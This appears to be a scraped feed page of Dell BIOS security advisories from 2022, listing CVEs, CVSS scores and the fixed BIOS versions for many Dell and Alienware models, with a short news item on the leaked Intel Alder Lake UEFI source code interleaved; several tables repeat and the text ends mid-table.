Dell BIOS contains a use of uninitialized variable vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

**Vaikutus**

High

**Tiedot**

**Third-party Component**

**CVE(s)**

**More Information**

Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory

CVE-2019-0086

INTEL-SA-00213

CVE-2019-0091

CVE-2019-0093

2019.2 IPU – Intel® CSME, Intel® SPS, Intel® TXE, Intel® AMT, Intel® PTT and Intel® DAL Advisory

CVE-2019-0169

INTEL-SA-00241

CVE-2019-11147

CVE-2019-11104

CVE-2019-11090

CVE-2019-11087

CVE-2019-11101

2020.1 IPU – Intel® CSME, SPS, TXE, AMT, ISM and DAL Advisory

CVE-2020-0536

INTEL-SA-00295

CVE-2020-0539

CVE-2020-0545

2020.2 IPU – Intel® CSME, SPS, TXE, AMT and DAL Advisory

CVE-2020-8745

  
INTEL-SA-00391

CVE-2020-8705

CVE-2020-12303

CVE-2020-12355

2020.2 IPU – BIOS Advisory

CVE-2020-0587

INTEL-SA-00358

CVE-2020-0591

CVE-2020-0592

CVE-2020-0593

Intel BIOS Platform Sample Code Advisory

CVE-2020-8738

INTEL-SA-00390

CVE-2020-8739

CVE-2020-8740

CVE-2020-8764

2021.1 IPU – Intel® CSME, SPS and LMS Advisory  
 

CVE-2020-24507

INTEL-SA-00459

CVE-2020-8703

2021.1 IPU – BIOS Advisory

CVE-2020-12358

INTEL-SA-00463

CVE-2020-12360

CVE-2020-24486

Intel BSSA DFT Advisory

CVE-2021-0144

INTEL-SA-00525

BIOS Reference Code Advisory

CVE-2021-0157

INTEL-SA-00562

2021.2 IPU - Intel® Processor Breakpoint Control Flow Advisory

CVE-2021-0127

Intel-SA-00532

Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory

CVE-2019-0086

INTEL-SA-00213

CVE-2019-0091

CVE-2019-0093

 

**Proprietary Code CVE(s)**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-34390

Dell BIOS contains a use of uninitialized variable vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-34391

Dell Client BIOS Versions prior to the remediated version contain an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

**Third-party Component**

**CVE(s)**

**More Information**

Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory

CVE-2019-0086

INTEL-SA-00213

CVE-2019-0091

CVE-2019-0093

2019.2 IPU – Intel® CSME, Intel® SPS, Intel® TXE, Intel® AMT, Intel® PTT and Intel® DAL Advisory

CVE-2019-0169

INTEL-SA-00241

CVE-2019-11147

CVE-2019-11104

CVE-2019-11090

CVE-2019-11087

CVE-2019-11101

2020.1 IPU – Intel® CSME, SPS, TXE, AMT, ISM and DAL Advisory

CVE-2020-0536

INTEL-SA-00295

CVE-2020-0539

CVE-2020-0545

2020.2 IPU – Intel® CSME, SPS, TXE, AMT and DAL Advisory

CVE-2020-8745

  
INTEL-SA-00391

CVE-2020-8705

CVE-2020-12303

CVE-2020-12355

2020.2 IPU – BIOS Advisory

CVE-2020-0587

INTEL-SA-00358

CVE-2020-0591

CVE-2020-0592

CVE-2020-0593

Intel BIOS Platform Sample Code Advisory

CVE-2020-8738

INTEL-SA-00390

CVE-2020-8739

CVE-2020-8740

CVE-2020-8764

2021.1 IPU – Intel® CSME, SPS and LMS Advisory  
 

CVE-2020-24507

INTEL-SA-00459

CVE-2020-8703

2021.1 IPU – BIOS Advisory

CVE-2020-12358

INTEL-SA-00463

CVE-2020-12360

CVE-2020-24486

Intel BSSA DFT Advisory

CVE-2021-0144

INTEL-SA-00525

BIOS Reference Code Advisory

CVE-2021-0157

INTEL-SA-00562

2021.2 IPU - Intel® Processor Breakpoint Control Flow Advisory

CVE-2021-0127

Intel-SA-00532

Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory

CVE-2019-0086

INTEL-SA-00213

CVE-2019-0091

CVE-2019-0093

 

**Proprietary Code CVE(s)**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-34390

Dell BIOS contains a use of uninitialized variable vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-34391

Dell Client BIOS Versions prior to the remediated version contain an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell recommends all customers update at the earliest opportunity.

Go to the Drivers and Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

**Product**

**BIOS Update Version**

**BIOS Release Date**

Alienware Area-51 R4

2.0.6

08/30/2022

Alienware Area-51 R5

2.0.6

08/30/2022

See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell recommends all customers update at the earliest opportunity.

Go to the Drivers and Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

**Product**

**BIOS Update Version**

**BIOS Release Date**

Alienware Area-51 R4

2.0.6

08/30/2022

Alienware Area-51 R5

2.0.6

08/30/2022

**Keinoja ongelman kiertämiseen tai lieventämiseen**

None

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022/09/30

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Lisätietoja**

Dell Technologies would like to thank yngweijw for reporting CVE-2022-34390 and CVE-2022-34391.

30 syysk. 2022

CVE-2022-34390: DSA-2022-269: Dell Client Platform BIOS Security Update for Alienware Area-51 R4/R5

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVE(s)**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-32483

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

5.6

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L

CVE-2022-32484

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

5.6

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L

CVE-2022-32485

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32487

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32488

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

8.2

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32489

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

8.2

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32491

Dell BIOS contains a Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by manipulating an SMI to cause an arbitrary write during SMM.

4.1

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N

CVE-2022-32493

Dell BIOS contains a Stack-Based Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

  

**Proprietary Code CVE(s)**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-32483

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

5.6

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L

CVE-2022-32484

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

5.6

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L

CVE-2022-32485

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32487

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32488

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

8.2

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32489

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

8.2

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32491

Dell BIOS contains a Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by manipulating an SMI to cause an arbitrary write during SMM.

4.1

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N

CVE-2022-32493

Dell BIOS contains a Stack-Based Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

  

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell recommends all customers update at the earliest opportunity.

Go to the Drivers and Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell recommends all customers update at the earliest opportunity.

Go to the Drivers and Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

**Keinoja ongelman kiertämiseen tai lieventämiseen**

None

**Kiitokset**

Dell Technologies would like to thank yngweijw for reporting CVE-2022-32483, CVE-2022-32484, CVE-2022-32485, CVE-2022-32487, CVE-2022-32488, CVE-2022-32489, CVE-2022-32491, and CVE-2022-32493.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022/09/29

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Lisätietoja**

**Product**

**BIOS Update Version**

**BIOS Release Date (MM/DD/YYYY)**

Alienware Area 51m R1

1.21.0

08/08/2022

Alienware Area 51m R2

1.18.0

08/08/2022

Alienware Aurora R10

2.3.1

08/08/2022

Alienware Aurora R11

1.0.16

08/02/2022

Alienware Aurora R12

1.1.16

07/28/2022

Alienware Aurora R13

1.5.0

08/09/2022

Alienware Aurora R8

1.0.23

08/03/2022

Alienware Aurora R9

1.0.20

08/03/2022

Alienware m15 R1

2.14.0

08/09/2022

Alienware m15 R2

1.17.0

08/08/2022

Alienware m15 R3

1.19.0

08/08/2022

Alienware m15 R4

1.13.0

08/08/2022

Alienware m17 R1

2.14.0

08/09/2022

Alienware m17 R2

1.17.0

08/08/2022

Alienware m17 R3

1.19.0

08/08/2022

Alienware m17 R4

1.13.0

08/08/2022

Alienware x14

1.5.0

08/19/2022

Alienware x15 R1

1.11.0

08/08/2022

Alienware x15 R2

1.7.0

08/29/2022

Alienware x17 R1

1.11.0

08/08/2022

Alienware x17 R2

1.7.0

08/29/2022

Aurora R14

2.3.0

08/08/2022

ChengMing 3980

2.24.0

08/09/2022

ChengMing 3988

1.11.0

08/08/2022

ChengMing 3990

1.14.0

08/10/2022

ChengMing 3991

1.14.0

08/10/2022

Dell G3 15 3590

1.18.0

08/09/2022

Dell G3 3579

1.22.0

08/16/2022

Dell G3 3779

1.22.0

08/16/2022

Dell G5 15 5590

1.20.0

08/09/2022

Dell G5 5000

1.10.0

08/08/2022

Dell G5 5090

1.15.0

08/10/2022

Dell G7 17 7590

1.20.0

08/09/2022

Dell G7 17 7790

1.20.0

08/09/2022

Dell Latitude 3480

1.21.0

08/16/2022

Dell Latitude 3580

1.21.0

08/16/2022

Edge Gateway 3000 series

1.9.0

08/09/2022

Edge Gateway 5000

1.19.0

08/09/2022

Embedded Box PC 3000

1.15.0

08/08/2022

Embedded Box PC 5000

1.16.0

08/09/2022

Inspiron 14 3467

2.20.0

08/11/2022

Inspiron 15 3567

2.20.0

08/11/2022

Inspiron 15 5582 2-in-1

2.16.0

08/23/2022

Inspiron 3277

1.21.0

08/09/2022

Inspiron 3280

1.16.0

08/09/2022

Inspiron 3470

2.24.0

08/09/2022

Inspiron 3471

1.11.0

08/08/2022

Inspiron 3477

1.21.0

08/09/2022

Inspiron 3480

1.20.0

08/08/2022

Inspiron 3480

1.16.0

08/09/2022

Inspiron 3481

1.18.0

08/08/2022

Inspiron 3482

1.15.0

08/08/2022

Inspiron 3490

1.20.0

08/08/2022

Inspiron 3493

1.23.0

08/08/2022

Inspiron 3501

1.17.0

08/08/2022

Inspiron 3502

1.9.0

08/08/2022

Inspiron 3580

1.20.0

08/08/2022

Inspiron 3580

1.20.0

08/08/2022

Inspiron 3581

1.18.0

08/08/2022

Inspiron 3581

1.18.0

08/08/2022

Inspiron 3582

1.15.0

08/08/2022

Inspiron 3590

1.20.0

08/08/2022

Inspiron 3593

1.23.0

08/08/2022

Inspiron 3670

2.24.0

08/09/2022

Inspiron 3671

1.11.0

08/08/2022

Inspiron 3780

1.20.0

08/08/2022

Inspiron 3781

1.18.0

08/08/2022

Inspiron 3782

1.15.0

08/08/2022

Inspiron 3790

1.20.0

08/08/2022

Inspiron 3793

1.23.0

08/08/2022

Inspiron 3880

1.14.0

08/10/2022

Inspiron 3881

1.14.0

08/10/2022

Inspiron 5390

1.18.0

08/05/2022

Inspiron 5391

1.19.0

08/09/2022

Inspiron 5400

1.13.0

08/02/2022

Inspiron 5401 All-In-One

1.13.0

08/02/2022

Inspiron 5477

1.2.20

08/08/2022

Inspiron 5480

2.16.0

08/23/2022

Inspiron 5481 2-in-1

2.16.0

08/23/2022

Inspiron 5482

2.16.0

08/23/2022

Inspiron 5490

1.20.0

08/08/2022

Inspiron 5490 All-In-One

1.16.0

08/09/2022

Inspiron 5491 2-in-1

1.16.0

08/04/2022

Inspiron 5493

1.23.0

08/08/2022

Inspiron 5494

1.20.0

08/08/2022

Inspiron 5498

1.20.0

08/08/2022

Inspiron 5570

1.10.0

08/10/2022

Inspiron 5580

2.16.0

08/23/2022

Inspiron 5583

1.20.0

08/04/2022

Inspiron 5584

1.20.0

08/04/2022

Inspiron 5590

1.20.0

08/08/2022

Inspiron 5591 2-in-1

1.16.0

08/04/2022

Inspiron 5593

1.23.0

08/08/2022

Inspiron 5594

1.20.0

08/08/2022

Inspiron 5598

1.20.0

08/08/2022

Inspiron 5680

2.12.0

08/10/2022

Inspiron 5770

1.10.0

08/10/2022

Inspiron 7000

1.19.0

08/09/2022

Inspiron 7370

1.25.0

08/11/2022

Inspiron 7373 2-in-1

1.25.0

08/11/2022

Inspiron 7380

1.18.0

08/08/2022

Inspiron 7386

1.16.0

08/09/2022

Inspiron 7390

1.19.0

08/04/2022

Inspiron 7391

1.17.0

08/04/2022

Inspiron 7490

1.15.0

08/08/2022

Inspiron 7570

1.25.0

08/11/2022

Inspiron 7573 2-in-1

1.25.0

08/11/2022

Inspiron 7580

1.18.0

08/08/2022

Inspiron 7586

1.16.0

08/09/2022

Inspiron 7590

1.19.0

08/04/2022

Inspiron 7590

1.15.0

08/09/2022

Inspiron 7591

1.17.0

08/04/2022

Inspiron 7591

1.15.0

08/09/2022

Inspiron 7700 AIO

1.13.0

08/02/2022

Inspiron 7777

1.2.20

08/08/2022

Inspiron 7786

1.16.0

08/09/2022

Inspiron 7790

1.16.0

08/09/2022

Inspiron 7791

1.17.0

08/04/2022

Inspiron 5491 All-In-One

1.16.0

08/09/2022

Latitude 13 3380

1.19.0

08/16/2022

Latitude 3120

1.10.0

08/10/2022

Latitude 3180

1.19.0

08/15/2022

Latitude 3189

1.19.0

08/15/2022

Latitude 3190

1.22.0

08/15/2022

Latitude 3190 2-in-1

1.22.0

08/15/2022

Latitude 3300

1.17.0

08/18/2022

Latitude 3301

1.23.0

08/05/2022

Latitude 3310

1.16.0

08/10/2022

Latitude 3310 2-in-1

1.15.0

08/18/2022

Latitude 3379

1.0.36

08/16/2022

Latitude 3390

1.21.0

08/18/2022

Latitude 3400

1.25.0

08/04/2022

Latitude 3490

1.20.0

08/11/2022

Latitude 3500

1.25.0

08/04/2022

Latitude 3590

1.20.0

08/11/2022

Latitude 5280

1.26.0

08/12/2022

Latitude 5285 2-in-1

1.19.0

08/12/2022

Latitude 5289

1.29.0

08/15/2022

Latitude 5290

1.24.0

08/12/2022

Latitude 5290 2-in-1

1.22.0

08/25/2022

Latitude 5300

1.23.0

08/21/2022

Latitude 5300 2-in-1

1.23.0

08/21/2022

Latitude 5310

1.15.0

08/09/2022

Latitude 5310 2-in-1

1.15.0

08/09/2022

Latitude 5400

1.19.0

08/12/2022

Latitude 5401

1.21.0

08/12/2022

Latitude 5410

1.15.0

08/11/2022

Latitude 5411

1.15.0

08/11/2022

Latitude 5414 Rugged

1.36.0

08/16/2022

Latitude 5420 Rugged

1.18.0

08/16/2022

Latitude 5424 Rugged

1.18.0

08/16/2022

Latitude 5480

1.26.0

08/12/2022

Latitude 5488

1.26.0

08/12/2022

Latitude 5490

1.24.0

08/12/2022

Latitude 5491

1.23.0

08/12/2022

Latitude 5495

1.9.0

08/16/2022

Latitude 5500

1.19.0

08/12/2022

Latitude 5501

1.21.0

08/12/2022

Latitude 5510

1.15.0

08/11/2022

Latitude 5511

1.15.0

08/11/2022

Latitude 5580

1.26.0

08/12/2022

Latitude 5590

1.24.0

08/12/2022

Latitude 5591

1.23.0

08/12/2022

Latitude 7200 2-in-1

1.19.0

08/09/2022

Latitude 7210 2-in-1

1.16.0

08/22/2022

Latitude 7212 Rugged Extreme Tablet

1.40.0

08/16/2022

Latitude 7214 Rugged Extreme

1.36.0

08/16/2022

Latitude 7220 Rugged Extreme Tablet

1.23.0

08/16/2022

Latitude 7220EX Rugged Extreme Tablet

1.23.0

08/16/2022

Latitude 7275 2-in-1

1.16.0

08/15/2022

Latitude 7280

1.27.0

08/15/2022

Latitude 7285 2-in-1

1.17.0

08/12/2022

Latitude 7290

1.27.0

08/16/2022

Latitude 7300

1.21.0

08/10/2022

Latitude 7310

1.17.0

08/10/2022

Latitude 7370

1.30.3

08/16/2022

Latitude 7380

1.27.0

08/15/2022

Latitude 7389

1.29.0

08/15/2022

Latitude 7390

1.27.0

08/16/2022

Latitude 7390 2-in-1

1.26.0

08/12/2022

Latitude 7400

1.21.0

08/10/2022

Latitude 7400 2-in-1

1.18.0

08/09/2022

Latitude 7410

1.17.0

08/10/2022

Latitude 7414 Rugged Extreme

1.36.0

08/16/2022

Latitude 7424 Rugged Extreme

1.18.0

08/16/2022

Latitude 7480

1.27.0

08/15/2022

Latitude 7490

1.27.0

08/16/2022

Latitude 9410

1.16.0

08/10/2022

Latitude 9510

1.14.0

08/09/2022

Latitude E5270

1.32.3

08/12/2022

Latitude E5470

1.32.3

08/12/2022

Latitude E5570

1.32.3

08/12/2022

Latitude E7270

1.35.3

08/15/2022

Latitude E7470

1.35.3

08/15/2022

OptiPlex 3050

1.21.0

08/09/2022

OptiPlex 3040

1.20.1

08/09/2022

OptiPlex 3046

1.17.0

08/09/2022

OptiPlex 3050 All-In-One

1.22.0

08/08/2022

OptiPlex 3060

1.21.0

08/09/2022

OptiPlex 3070

1.16.0

08/09/2022

OptiPlex 3080

2.14.0

08/10/2022

OptiPlex 3090

2.7.0

08/10/2022

OptiPlex 3280 All-In-One

1.15.0

08/08/2022

OptiPlex 5050

1.21.0

08/11/2022

OptiPlex 5055 A-Series

1.7.0

09/07/2022

OptiPlex 5055 Ryzen APU

1.7.0

09/07/2022

OptiPlex 5055 Ryzen CPU

1.7.0

09/07/2022

OptiPlex 5060

1.21.0

08/09/2022

OptiPlex 5070

1.16.0

08/09/2022

OptiPlex 5080

1.14.0

08/10/2022

OptiPlex 5250

1.22.0

08/08/2022

OptiPlex 5260 All-In-One

1.21.0

08/08/2022

OptiPlex 5480 All-In-One

1.16.0

08/08/2022

OptiPlex 7040

1.24.0

08/09/2022

OptiPlex 7050

1.21.0

08/09/2022

OptiPlex 7060

1.21.0

08/09/2022

OptiPlex 7070

1.16.0

08/09/2022

OptiPlex 7070 Ultra

1.14.0

08/09/2022

OptiPlex 7071

1.15.0

08/09/2022

OptiPlex 7080

1.14.0

08/09/2022

OptiPlex 7450

1.22.0

08/08/2022

OptiPlex 7460 All-In-One

1.21.0

08/08/2022

OptiPlex 7470 All-In-One

1.16.0

08/08/2022

OptiPlex 7480 All-In-One

1.16.0

08/08/2022

OptiPlex 7760 All-In-One

1.21.0

08/08/2022

OptiPlex 7770 All-In-One

1.16.0

08/08/2022

OptiPlex 7780 All-In-One

1.16.0

08/08/2022

OptiPlex XE3

1.21.0

08/09/2022

Precision 3240 Compact

1.13.0

08/11/2022

Precision 3420 Tower

2.22.0

08/08/2022

Precision 3430 Tower

1.20.0

08/09/2022

Precision 3431 Tower

1.15.0

08/09/2022

Precision 3440

1.14.0

08/09/2022

Precision 3510

1.32.3

08/12/2022

Precision 3520

1.26.0

08/12/2022

Precision 3530

1.23.0

08/12/2022

Precision 3540

1.19.0

08/12/2022

Precision 3541

1.21.0

08/12/2022

Precision 3550

1.15.0

08/11/2022

Precision 3551

1.15.0

08/11/2022

Precision 3620 Tower

2.22.0

08/08/2022

Precision 3630 Tower

2.15.0

08/08/2022

Precision 3640 Tower

1.16.0

08/16/2022

Precision 3930 Rack

2.20.0

08/10/2022

Precision 5510

1.23.0

08/11/2022

Precision 5530

1.26.0

08/09/2022

Precision 5530 2-in-1

1.20.8

08/09/2022

Precision 5540

1.18.0

08/09/2022

Precision 5720 All-In-One

2.15.0

08/09/2022

Precision 5820 Tower

2.21.0

08/10/2022

Precision 7510

1.28.3

08/12/2022

Precision 7520

1.26.0

08/12/2022

Precision 7530

1.24.0

08/12/2022

Precision 7540

1.21.0

08/10/2022

Precision 7550

1.17.0

08/09/2022

Precision 7710

1.28.3

08/12/2022

Precision 7720

1.26.0

08/12/2022

Precision 7730

1.24.0

08/12/2022

Precision 7740

1.21.0

08/10/2022

Precision 7750

1.17.0

08/09/2022

Precision 7820 Tower

2.26.1

09/07/2022

Precision 7920 Tower

2.26.1

09/07/2022

Vostro 3070

2.24.0

08/09/2022

Vostro 3267

1.22.0

08/10/2022

Vostro 3268

1.22.0

08/10/2022

Vostro 3401

1.17.0

08/08/2022

Vostro 3470

2.24.0

08/09/2022

Vostro 3471

1.11.0

08/08/2022

Vostro 3480

1.20.0

08/08/2022

Vostro 3481

1.18.0

08/08/2022

Vostro 3490

1.20.0

08/08/2022

Vostro 3501

1.17.0

08/08/2022

Vostro 3580

1.20.0

08/08/2022

Vostro 3581

1.18.0

08/08/2022

Vostro 3582

1.15.0

08/08/2022

Vostro 3583

1.20.0

08/08/2022

Vostro 3584

1.18.0

08/08/2022

Vostro 3590

1.20.0

08/08/2022

Vostro 3667

1.22.0

08/10/2022

Vostro 3668

1.22.0

08/10/2022

Vostro 3669

1.22.0

08/10/2022

Vostro 3670

2.24.0

08/09/2022

Vostro 3671

1.11.0

08/08/2022

Vostro 3681

2.14.0

08/10/2022

Vostro 3881

2.14.0

08/10/2022

Vostro 3888

2.14.0

08/10/2022

Vostro 5090

1.15.0

08/09/2022

Vostro 5390

1.18.0

08/05/2022

Vostro 5391

1.19.0

08/09/2022

Vostro 5481

2.16.0

08/23/2022

Vostro 5490

1.20.0

08/08/2022

Vostro 5491

1.23.0

08/08/2022

Vostro 5581

2.16.0

08/23/2022

Vostro 5590

1.20.0

08/08/2022

Vostro 5591

1.23.0

08/08/2022

Vostro 5880

1.14.0

08/09/2022

Vostro 7590

1.15.0

08/09/2022

Wyse 5070

1.18.0

08/10/2022

Wyse 5470

1.15.0

08/16/2022

Wyse 5470 All-In-One

1.16.1

08/26/2022

Wyse 7040 Thin Client

1.17.0

08/08/2022

XPS 13 7390

1.17.0

08/09/2022

XPS 13 7390 2-in-1

1.18.0

08/09/2022

XPS 13 9300

1.14.0

08/09/2022

XPS 13 9365 2-in-1

2.23.0

08/25/2022

XPS 13 9370

1.21.0

08/24/2022

XPS 13 9380

1.20.0

08/09/2022

XPS 15 7590

1.26.0

08/09/2022

XPS 15 9575 2-in-1

1.22.0

08/09/2022

XPS 7590

1.18.0

08/09/2022

XPS 8930

1.1.24

08/03/2022

XPS 8940

2.9.0

08/08/2022

XPS 8950

1.5.0

08/08/2022

Alienware 15 R2, Alienware 17, Alienware Area-51m, Alienware 17 R4, Alienware 17 R2, Alienware 17 R3, Alienware Area 51, Alienware Aurora, Alienware Aurora R11, Alienware Aurora R12, Alienware Aurora R13, Alienware m17 R2, Alienware m17 R3Näytä lisää

29 syysk. 2022

CVE-2022-32483: DSA-2022-248: Dell Client BIOS Security Update

Exposed code included private key for Intel Boot Guard, meaning it can no longer be trusted, according to a researcher.

Intel has confirmed the leak of the Unified Extensible Firmware Interface (UEFI) BIOS of Alder Lake, the company's code name for its latest processor — the 12th generation Intel Core processor — which debuted in late 2021. 

According to reports, the Intel UEFI code was first leaked late last week on 4chan, and later GitHub, and it contained 5.97GB of data. It was dated 9-30-22, likely when it was exfiltrated, analysts reported. "In addition, one thing should be noted that the key pairs required by Boot Guard during provisioning stage is also included in the leaked content," researchers from Hardened Vault who analyzed the leaked data explained. 

Researcher Mark Ermolov noted the same thing on Twitter on Oct. 8, adding, "... the Intel Boot Guard on the vendor's platforms can no longer be trusted." 

The researchers at Hardened Vault pointed out the code could be particularly useful for malicious actors who want to reverse engineer the code to find vulnerabilities. 

In a statement provided to Security Week, Intel acknowledged the breach, attributing it to a third-party and downplaying its potential security risk. "Intel does not believe this exposes, or creates, any new security vulnerabilities as we do not rely on obfuscation of information as a security measure," Intel said in a statement. "We are reaching out to customers, partners and the security research community to keep them informed of this situation." 

The Hardened Vault team said it hasn't been able to trace the data back to the leaker but suggested that the developer of the firmware solution, Insyde, might have more information to share. "But it is still impossible to confirm the person who leaked it," the team wrote. "The leak is part of Insyde solution which integrate Intel’s resources. Perhaps Insyde knows more than we do."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Intel Processor UEFI Source Code Leaked

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE‑2022-32486

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32492

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

  
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE‑2022-32486

